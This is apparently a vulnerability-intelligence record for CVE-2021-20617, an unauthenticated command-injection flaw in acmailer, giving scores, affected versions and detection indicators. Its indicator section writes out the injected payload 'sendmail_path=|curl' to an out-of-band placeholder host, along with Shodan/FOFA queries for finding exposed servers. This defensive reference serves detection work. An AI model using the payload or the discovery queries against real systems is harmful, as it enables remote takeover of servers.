CVE-2021-20617
Published: 2021-01-14

Priority: P1 (82)
Severity: critical, CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit status: exploited in the wild (VulnCheck KEV, in-the-wild exploit)
EPSS: 7.87% (94.0th percentile)
Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server via unspecified vectors.

Affected (3 ranges)

Vendor         Product                    Version range   Fixed in
acmailer       acmailer                   <= 4.0.1        (not listed)
acmailer       acmailer_db                <= 1.1.3        (not listed)
seeds_co_ltd   acmailer_and_acmailer_db   (not listed)    (not listed)

Detection & IOCs (extracted from sources)

url: POST /init_ctl.cgi
path: /init_ctl.cgi
command: sendmail_path=|curl http://{{interactsh-url}}
other: shodan: title="ACMAILER4.0"
other: fofa: title="ACMAILER4.0"

  • The exploit targets the /init_ctl.cgi endpoint via HTTP POST with a pipe-injected sendmail_path parameter, triggering OS command execution that is confirmed through a curl callback (OOB/OAST detection).
  • Successful exploitation results in an HTTP 302 redirect response; monitor for 302 responses from /init_ctl.cgi combined with OOB curl callbacks.
  • OOB confirmation: look for inbound HTTP requests with 'User-Agent: curl' originating from the target server after a POST to /init_ctl.cgi.
  • The Content-Type of the exploit request is application/x-www-form-urlencoded; filter POST requests to /init_ctl.cgi with this content type and a pipe character in the sendmail_path field.
  • Exposed acmailer instances can be discovered via Shodan/FOFA using the title fingerprint 'ACMAILER4.0'; use this to identify internet-facing vulnerable assets.
  • The exploit payload uses a pipe-injected sendmail_path (|curl ...) to achieve OS command injection; the injection vector is the sendmail_path POST parameter, not a separate binary or config file.
  • The vulnerability affects acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier; scope is limited to these version ranges.
  • The attack vector is unauthenticated (PR:N, UI:N); no prior authentication or user interaction is required to exploit /init_ctl.cgi.

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      10.0    CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck   -         9.8     CRITICAL   -